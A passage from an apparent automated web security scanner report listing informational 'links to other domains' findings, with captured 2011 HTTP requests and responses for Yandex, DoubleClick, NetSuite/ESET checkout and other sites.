http://direct.yandex.ru/search?from=http://webalta.ru/&ref-page=57617

Request

GET /code/57617?rnd=309442&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2F&grab=dNCf0L7QuNGB0LrQvtCy0LDRjyDRgdC40YHRgtC10LzQsCBXZWJhbHRh HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7397

var y5_sLinkHead = 'http://an.yandex.ru/count/CvVSK7g7hke40000ZhKnMDi4XP4H3fQb-Qd2aRHle6OCarIaeW00G7m3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if
...[SNIP]...
</span>','=i8Br_PK2cm5kGpa1YQ8wP1oOYncShoHYjPgkj8TAagXH_XwTe-vs0u-xwCP92v-ryehu3fbfe91g6AUF6q6ae000G7y7','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=bnwoofK2cmHhK3i1cg6sEbYIfd5k38-w49TH3f-pz3zU2wG0U0G0'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...

22.6. http://an.yandex.ru/code/66894 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/code/66894

Issue detail

The page was loaded from a URL containing a query string:

http://an.yandex.ru/code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU=

The response contains the following link to another domain:

http://advertising.yandex.ru/welcome/?from=context

Request

Response

22.7. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl

Issue detail

The page was loaded from a URL containing a query string:

https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T

The response contains the following links to other domains:

https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0
https://secure.eset.com/us/scripts/lib/s_code3.js
https://secure.eset.com/us/store/geoIpRedirect

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
00&bgbutton=F2F4F6&bgrequiredfld=ffffff&font=Arial%2CHelvetica%2Csans-serif&size_site_content=10pt&size_site_title=10pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...


<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...

22.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl/c.438708/n.1/sc.4/.f

Issue detail

The page was loaded from a URL containing a query string:

https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T

The response contains the following links to other domains:

https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0
https://secure.eset.com/us/scripts/lib/s_code3.js
https://secure.eset.com/us/store/geoIpRedirect

Request

Response

22.9. http://direct.yandex.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://direct.yandex.ru/?partner

The response contains the following links to other domains:

http://advertising.yandex.ru/
http://advertising.yandex.ru/contact/agency/
http://advertising.yandex.ru/seminar/
http://advertising.yandex.ru/welcome/
http://api.yandex.ru/
http://ba.yandex.ru/
http://clck.yandex.ru/redir/dtype=stred/pid=36/cid=70390/*http:/www.advertising.yandex.ru/welcome/pdf/direct_booklet.pdf
http://direct.yandex.com/
http://help.yandex.ru/direct/?id=1116045
http://img.yandex.net/y5/1.5b-c/mega-y5.js
http://kiks.yandex.ru/fu/
http://mc.yandex.ru/watch/191494
http://mc.yandex.ru/watch/34
http://metrika.yandex.ru/
http://money.yandex.ru/
http://narod.yandex.ru/
http://partner.market.yandex.ru/yandex.market/
http://partner.yandex.ru/
http://partner.yandex.ru/?hnt=dir
http://passport.yandex.ru/passport?mode=auth&msg=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl
http://pdd.yandex.ru/
http://site.yandex.ru/
http://webmaster.yandex.ru/
http://widgets.yandex.ru/
http://wordstat.yandex.ru/
http://www.yandex.ru/
http://www.yandex.ru/all
http://yaca.yandex.ru/
http://yandex.st/jquery/1.4.2/jquery.min.js
http://yandex.st/lego/2.4-73/common/js/_common.js
http://yandex.st/lego/_/X31pO5JJJKEifJ7sfvuf3mGeD_8.png

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
<link rel="SHORTCUT ICON" href="/favicon.ico"><script type="text/javascript" src="http://img.yandex.net/y5/1.5b-c/mega-y5.js"></script><link rel="shortcut icon" href="/favicon.ico"/><script type="text/javascript" charset="utf-8" src="//yandex.st/jquery/1.4.2/jquery.min.js"></script><script type="text/javascript" charset="utf-8" src="//yandex.st/lego/2.4-73/common/js/_common.js"></script>
...[SNIP]...
<noscript><img alt=" " style="position:absolute" src="//mc.yandex.ru/watch/34"></noscript>
...[SNIP]...
<noscript><img alt=" " style="position:absolute" src="//mc.yandex.ru/watch/191494"></noscript>
...[SNIP]...
<div class="b-head-logo__logo">
<a href="http://www.yandex.ru" class="b-head-logo__link"><img class="b-head-logo__img" border="0" alt="............" src="//yandex.st/lego/_/X31pO5JJJKEifJ7sfvuf3mGeD_8.png"/></a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://metrika.yandex.ru" class="b-head-tabs__link">..............</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://partner.yandex.ru" class="b-head-tabs__link">.................. ........</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://partner.market.yandex.ru/yandex.market/" class="b-head-tabs__link">............</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://ba.yandex.ru" class="b-head-tabs__link">........</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://money.yandex.ru" class="b-head-tabs__link">............</a>
...[SNIP]...
<li class="b-dropdown__item b-dropdown__visible">

<a class="b-dropdown__or" href="http://www.yandex.ru/all"><span class="b-pseudo-link">
...[SNIP]...
<li class="b-dropdown__item"><a href="http://api.yandex.ru">API</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://webmaster.yandex.ru">..................</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://widgets.yandex.ru">..............</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://yaca.yandex.ru">..............</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://narod.yandex.ru">..........</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://site.yandex.ru">.......... ...... ..........</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://pdd.yandex.ru">.......... ...... ............</a>
...[SNIP]...
<li class="b-dropdown__item b-dropdown__line"><a href="http://www.yandex.ru/all">...... ..............</a>
...[SNIP]...
<td class="b-hmenu__item item">
<a href="http://wordstat.yandex.ru/" onclick="try {yaCounter191494.reachGoal('MDNWORDNO'); } catch (e) {};OpenWindow('http://wordstat.yandex.ru/?direct=1', 870, 600, 'advq', 1); return false;">............ ........</a>
...[SNIP]...
<td class="b-head-userinfo__entry"><a href="http://passport.yandex.ru/passport?mode=auth&msg=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" class="b-pseudo-link">..........</a>
...[SNIP]...
<div class="b-morda-main__pay">.... ..................:<a href="http://money.yandex.ru/"><img class="b-morda-main__pay__img" src="/block/b-morda-main/pay/b-morda-main__pay-yamoney.gif" alt="........................." title="........................."/>
...[SNIP]...
</div><a class="b-morda-main__details" href="http://advertising.yandex.ru/welcome/" onclick="">.................. .. ...........................</a>
...[SNIP]...
</strong>.................. .......... ............................ <a target="_blank" href="http://help.yandex.ru/direct/?id=1116045">.................. .................... ................</a>
...[SNIP]...
<li class="b-morda-info__item">............................ <a href="http://clck.yandex.ru/redir/dtype=stred/pid=36/cid=70390/*http://www.advertising.yandex.ru/welcome/pdf/direct_booklet.pdf" onclick="try {yaCounter191494.reachGoal('MDIRDOWNPDFOFF'); } catch (e) {};">................ .... ..............</a>
...[SNIP]...
<li class="b-morda-info__item">.................. .................. ...................... .................. ................ <a href="http://advertising.yandex.ru/seminar/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNSEMINARALL'); } catch (e) {};">.... ........................ ..................</a>
...[SNIP]...
<li class="b-morda-info__item">.............. .... ............................ .............. .. .............. <a href="http://metrika.yandex.ru/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNMETRIKAALL'); } catch (e) {};">...........................</a>
...[SNIP]...
<li class="b-morda-info__item">.............. ...... ........ <a href="http://advertising.yandex.ru/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNADVERTALL'); } catch (e) {};">.................. ........................ ..............</a>
...[SNIP]...
<p>........ .. ...... ........ ........, .................. .. <a href="http://partner.yandex.ru/?hnt=dir" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNEAMALL'); } catch (e) {};">.................. ........ ..............</a>
...[SNIP]...
<p>.................... .............. .. .............. .......... <a href="http://advertising.yandex.ru/contact/agency/" onclick="try {yaCounter191494.reachGoal('MDNAGENCYALL'); } catch (e) {};">.................. ..................</a>
...[SNIP]...
<noscript onclick="return {name: 'i-flashcookie'}"><img src="http://kiks.yandex.ru/fu/" alt="" /></noscript>
...[SNIP]...
</a> ·
<a href="http://direct.yandex.com">in English</a>
...[SNIP]...
</span> «<a href="http://www.yandex.ru/">............</a>
...[SNIP]...
</a> · <a href="http://advertising.yandex.ru/">..............</a>
...[SNIP]...

22.10. http://foreign.dt00.net/zones/zone25.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://foreign.dt00.net
Path:	/zones/zone25.php

Issue detail

The page was loaded from a URL containing a query string:

http://foreign.dt00.net/zones/zone25.php?country=4&region=0

The response contains the following link to another domain:

http://usr.marketgid.com/demo/popunder/

Request

GET /zones/zone25.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/doping.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 644

document.write('<div style="height:90px;overflow:hidden;background:url(http://img.dt00.net/images/banners/ap-banner-bg.png) no-repeat;"><a href="http://usr.marketgid.com/demo/popunder/" target="_blank" style="display:block;margin:28px 0 0 40px;font:700 11px Tahoma,Verdana,Arial;color:#000;text-decoration:none;"><strong style="color:#d93329;">
...[SNIP]...

22.11. http://forums.manageengine.com/fbw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The page was loaded from a URL containing a query string:

http://forums.manageengine.com/fbw?fbwId=49000004360353

The response contains the following links to other domains:

http://css.zohostatic.com/discussions/v1/css/feedbackembed.css
http://css.zohostatic.com/discussions/v1/js/crossdomain.js
http://css.zohostatic.com/discussions/v1/js/zdjquery.min.js
http://discussions.zoho.com/home

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:11:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 25830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostatic.com/discussions/v1/css/feedbackembed.css" type="text/css" rel="stylesheet"/>
<script src="//css.zohostatic.com/discussions/v1/js/zdjquery.min.js" type="text/javascript" ></script>
<script src="//css.zohostatic.com/discussions/v1/js/crossdomain.js" type="text/javascript" ></script>
...[SNIP]...
<div class="footer">
<a href="http://discussions.zoho.com/home"><div class="flRight powzd">
...[SNIP]...

22.12. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759232&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741232531&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741232622&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=1953752540&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&eid=33895132&fu=0&ifi=1&dtd=160&xpc=Zp67Lq5gHf&p=http%3A//auto.webalta.ru

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3DAntag.co.uk/Auto_Moto%26adT%3DAuto%2BMoto%26gl%3DUS&usg=AFQjCNFLmqqweilSDGlL75ZPfwneIRZRLA

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759232&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741232531&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741232622&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=1953752540&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&eid=33895132&fu=0&ifi=1&dtd=160&xpc=Zp67Lq5gHf&p=http%3A//auto.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3DAntag.co.uk/Auto_Moto%26adT%3DAuto%2BMoto%26gl%3DUS&usg=AFQjCNFLmqqweilSDGlL75ZPfwneIRZRLA" target=_blank><img alt=".............. .... Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png" width=96></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.13. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759224&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741224908&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741224970&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=132012205&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=103&xpc=dKubZykpQN&p=http%3A//auto.webalta.ru

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3Dwww.shipasi.net%26adT%3DWorldwide%2BAuto%2BShipping%26gl%3DUS&usg=AFQjCNGXaMgiP48VAuDHxYijK6UMKa1kOQ

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759224&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741224908&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741224970&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=132012205&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=103&xpc=dKubZykpQN&p=http%3A//auto.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:14 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3Dwww.shipasi.net%26adT%3DWorldwide%2BAuto%2BShipping%26gl%3DUS&usg=AFQjCNGXaMgiP48VAuDHxYijK6UMKa1kOQ" target=_blank><img alt=".............. .... Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png" width=96></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.14. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758835&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740834875&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740835053&frm=0&adk=1607234649&ga_vid=1571659581.1303740835&ga_sid=1303740835&ga_hid=2038561959&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=237&xpc=SCB3C2OVZc&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.owlcti.com/energy%26adT%3DOwl%2BComputing%2BTech%26adU%3Dwww.ServerTech.com%26adT%3DServer%2BDowntime/Overload%253F%26adU%3Dwww.Deloitte.com/us%26adT%3DInsider%2BThreat%2BSecurity%26gl%3DUS&usg=AFQjCNGaNBAPUAlHhfIQiJnQRGGgqTVeGg

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758835&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740834875&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740835053&frm=0&adk=1607234649&ga_vid=1571659581.1303740835&ga_sid=1303740835&ga_hid=2038561959&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=237&xpc=SCB3C2OVZc&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:13:44 GMT
Server: cafe
Cache-Control: private
